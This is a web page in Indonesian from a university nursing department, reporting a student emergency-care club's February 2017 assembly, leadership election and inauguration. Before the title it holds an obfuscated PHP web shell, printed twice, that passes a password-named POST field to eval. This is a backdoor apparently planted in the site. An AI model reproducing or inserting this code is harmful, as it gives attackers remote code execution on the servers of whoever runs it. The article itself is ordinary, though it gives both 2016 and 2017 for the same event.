@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']);@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']); Musyawarah Besar dan Musyawarah Kerja (MUBES MUSKER) NCC EMERGENCY Ke- V | Keperawatan UMY

NCC Emergency menyelenggarakan Musyawarah Besar dan Musyawarah Kerja (MUBES MUSKER) Ke-V pada bulan Februari 2016.

Kegiatan pertama yang diselenggarakan adalah Musyawarah Besar NCC Emergency yang dilaksanakan pada tanggal 12 Februari 2017 dengan Tema ” Satukan suara jalin kebersamaan dengan musyawarah”. Kegiatan tersebut diikuti oleh seluruh anggota Nursing Care Club Emergency baik yang aktif atau tidak aktif (stemcell). Kegiatan tersebut dilaksanakn tiga hari dengan berbeda tempat, pada tanggal 12 Februari 2017 acara yang pertama yaitu Musyawarah Besar yang dilaksanakan di Amphi Theater G Universitas Muhammadiyah Yogyakarta, kegiatan tersebut dimulai dari jam 07.00 – 21.00. Dalam kegiatan musyawarah besar tersebut NCC Emergency membahas tentang AD ART, GBHO dan GBHK, dalam pembahasan itu anggota NCC Emergency akan mendiskusikan apakah sudah sesuai atau belum, kemudian setelah itu BPH kepengurusan NCC Emergency periode 2016/2017 melaporkan hasil Laporan Pertanggungjawaban setelah selesai menjadi BPH di tahun periode tersebut. Setelah itu acara terakhir dari Musyawarah Besar di hari pertama yaitu pembacaan visi misi calon ketua NCC Emergency periode 2017/2018.

Kemudian kegiatan selanjutnya yaitu Musyawarah Kerja NCC Emergency yang dilaksanakan pada tanggal 18 – 19 Februari 2017 di Wisma Sermo Asri Kulonprogo, dan dengan Tema yang sama yaitu ” Satukan suara jalin kebersamaan dengan musyawarah”. Dalam kegiatan Musyawarah Kerja kali ini pada tanggal 18 Februari 2017 diadakan debat calon ketua NCC Emergency periode 2017/2018 terlebih dahulu, kemudian dilanjutkan di hari berikutnya pada tanggal 19 Februari 2017 yaitu pemilihan umum ketua NCC Emergency periode 2017/2018, kemudian dilanjutkan serah terima jabatan dari ketua NCC Emergency periode 2016/2017 kepada ketua NCC Emergency periode 2017/2018 dan dilanjutkan pelantikan kepengurusan terbaru, dan diakhiri dengan acara pelantikan Level Basic dan Intermediet.

Dari rangkaian acara Musyawarah Besar dan Musyawarah Kerja ini bertujuan untuk dapat terjalin hubungan baik antara sesama anggota Nursing Care Club Emergency, demisioner, anggota yang telah lulus (stemcell), dan dengan pihak yang terkait, Terbentuknya kepengurusan baru periode 2017/2018, Terbentuknya program kerja jangka pendek dan program kerja jangka panjang, Terbentuknya sistem organisasi, dan terbuktinya kelulusan dan peningkatan level kepada anggota NCC Emergency yang telah mengikuti pelatihan-pelatihan selama satu tahun kepengurusan periode 2016/2017.